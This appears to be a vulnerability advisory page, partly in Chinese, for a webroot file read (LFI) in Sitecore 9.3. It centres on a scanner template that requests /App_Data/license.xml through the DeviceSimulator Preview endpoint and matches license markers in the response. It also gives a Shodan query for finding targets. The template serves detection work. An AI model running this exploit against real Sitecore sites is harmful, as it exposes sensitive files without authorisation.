sitecore-lfi: Sitecore 9.3 - Webroot File Read

日期: 2025-08-01 | 影响软件: Sitecore 9.3 | POC: 已公开

漏洞描述

SiteCore 9.3 is vulnerable to LFI.

PoC代码[已公开]

id: sitecore-lfi

info:
  name: Sitecore 9.3 - Webroot File Read
  author: DhiyaneshDK
  severity: high
  description: SiteCore 9.3 is vulnerable to LFI.
  reference:
    - https://blog.assetnote.io/2023/05/10/sitecore-round-two/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Sitecore"
  tags: sitecore,lfi,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<signedlicense id="
          - "<Signature"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200edd0f0e612e76eebbc3272c0f4770faef6aaf364dda364bf99dc4c712e80941022100ba7af8b3d92d9cc0ef51a7cb1b988cc28c612cdf53bad9754363985d01e217ad:922c64590222798bb761d5b6d8e72950